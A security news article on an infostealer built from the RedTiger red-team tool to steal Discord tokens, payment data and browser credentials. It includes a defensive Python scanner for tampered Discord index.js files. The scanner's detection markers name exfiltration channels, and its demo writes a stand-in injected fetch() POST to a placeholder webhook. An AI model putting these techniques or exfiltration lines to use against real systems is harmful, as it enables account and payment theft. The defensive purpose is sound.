Monday, October 27, 2025

Hackers steal Discord accounts with RedTiger-based infostealer


Attackers are using the open-source red-team tool RedTiger to build an infostealer that harvests Discord account information and payment data.

The malware can also steal credentials saved in the browser, cryptocurrency wallet data, and game accounts.

RedTiger is a Python-based penetration testing suite for Windows and Linux that bundles network scanning and password-cracking features, OSINT utilities, Discord-focused tools, and a malware builder.

Discord-related tools in RedTiger
Source: GitHub

RedTiger’s info-stealer component offers the usual capabilities: it grabs system information, browser cookies and passwords, crypto wallet data, game data, and Roblox and Discord data. It can also capture webcam snapshots and screenshots of the victim’s screen.

Though the venture marks its harmful features as “authorized use solely” on GitHub, its free and unconditional distribution and the dearth of any safeguards enable simple abuse.

RedTiger’s malware builder
Source: GitHub

According to a report from Netskope, threat actors are now abusing RedTiger’s info-stealer component, primarily to target French Discord account holders.

The attackers compiled RedTiger’s code with PyInstaller into standalone binaries and gave them gaming- or Discord-related names.

Once the info-stealer runs on the victim’s machine, it scans for Discord and browser database files. It then extracts plaintext and encrypted tokens via regex, validates the tokens against Discord’s API, and pulls the profile, email, multi-factor authentication, and subscription information.

Next, it injects custom JavaScript into Discord’s index.js to intercept API calls and capture events such as login attempts, purchases, and even password changes. It also extracts payment information (PayPal, credit cards) saved on Discord.
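Because the injection lives in a file the legitimate client loads on every start, the most useful defensive check is an integrity check on that file. The script below is an added example written for this article, not code from the Netskope report or from the RedTiger project. It assumes that a clean discord_desktop_core/index.js consists of the single statement module.exports = require('./core.asar'); and nothing else, so any extra code in that file is suspicious, and that the install lives under the usual app-*/modules/discord_desktop_core-*/discord_desktop_core/ layout. The marker strings are heuristics chosen for the example, not indicators from the report, and the directory tree the demo scans is constructed in a temporary folder.

```python
"""Check Discord desktop core index.js files for injected JavaScript.

Added example; not part of the Netskope report or of RedTiger.
Assumption: a clean discord_desktop_core/index.js is exactly the one-line
loader below. The scanner takes any root directory, so it can be pointed at
%LOCALAPPDATA%\\Discord on Windows or at a copied tree.
"""
import tempfile
from pathlib import Path

CLEAN_INDEX_JS = "module.exports = require('./core.asar');"

# Heuristic strings often found in injected token stealers (assumed, not
# taken from the report): exfil endpoints and API-hooking primitives.
SUSPICIOUS_MARKERS = (
    "webhook",          # Discord webhook exfiltration
    "gofile",           # anonymous upload service named in the report
    "XMLHttpRequest",   # hooking of the client's API calls
    "fetch(",
    "payment_source",   # Discord's payment-method endpoint path
)


def check_index_js(content: str) -> list[str]:
    """Return findings for one index.js body; an empty list means clean."""
    findings: list[str] = []
    stripped = content.strip()
    if stripped == CLEAN_INDEX_JS:
        return findings
    findings.append("index.js differs from the expected one-line loader")
    lowered = stripped.lower()
    for marker in SUSPICIOUS_MARKERS:
        if marker.lower() in lowered:
            findings.append(f"contains '{marker}'")
    if len(stripped) > 200:
        findings.append(f"unexpected size: {len(stripped)} bytes")
    return findings


def scan_discord_tree(root: str) -> dict[str, list[str]]:
    """Walk root and check every discord_desktop_core/index.js found."""
    results: dict[str, list[str]] = {}
    for path in Path(root).rglob("index.js"):
        if path.parent.name == "discord_desktop_core":
            text = path.read_text(encoding="utf-8", errors="replace")
            results[str(path)] = check_index_js(text)
    return results


def build_demo_tree() -> str:
    """Constructed sample tree: one clean and one tampered install."""
    root = tempfile.mkdtemp(prefix="discord_demo_")
    core = ("modules", "discord_desktop_core-1", "discord_desktop_core")
    clean = Path(root, "app-1.0.9000", *core)
    tampered = Path(root, "app-1.0.9001", *core)
    clean.mkdir(parents=True)
    tampered.mkdir(parents=True)
    (clean / "index.js").write_text(CLEAN_INDEX_JS, encoding="utf-8")
    # Constructed stand-in for injected code; not taken from the malware.
    (tampered / "index.js").write_text(
        CLEAN_INDEX_JS + "\n"
        "const hook = XMLHttpRequest.prototype.open;\n"
        "fetch('https://example.invalid/api/webhooks/0/x', {method: 'POST'});\n",
        encoding="utf-8",
    )
    return root


if __name__ == "__main__":
    for path, findings in scan_discord_tree(build_demo_tree()).items():
        status = "CLEAN" if not findings else "SUSPICIOUS: " + "; ".join(findings)
        print(f"{path}: {status}")
```

On a real host, point scan_discord_tree at the Discord install directory; any index.js that is not the bare loader should be treated as tampered and the client reinstalled from the official site rather than edited back by hand, since the injected code may also have modified other files.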

Discord data targeted by the malware
Source: Netskope

From the victim’s web browsers, RedTiger harvests saved passwords, cookies, history, credit cards, and browser extensions. The malware also captures desktop screenshots and scans the filesystem for .TXT, .SQL, and .ZIP files.

After collecting the data, the malware archives the files and uploads them to GoFile, a cloud storage service that allows anonymous uploads. The download link is then sent to the attacker via a Discord webhook, together with the victim metadata.

Regarding evasion, RedTiger is well-equipped, featuring anti-sandbox mechanisms and terminating when a debugger is detected. The malware also spawns 400 processes and creates 100 random files to flood forensic analysis with noise.

Spamming misleading files and processes on the host
Source: Netskope

While Netskope has not shared explicit distribution vectors for the weaponized RedTiger binaries, common methods for this kind of lure include Discord channels, malicious software download sites, forum posts, malvertising, and YouTube videos.

Users should avoid downloading executables or game tools such as mods, “trainers,” or “boosters” from unverified sources.

If you suspect compromise, reinstall the Discord desktop client from the official website first, then change your password (which also invalidates existing Discord tokens) from a clean device. Doing it in the other order means the injected index.js can capture the new password. Also clear saved data from browsers and enable MFA everywhere.

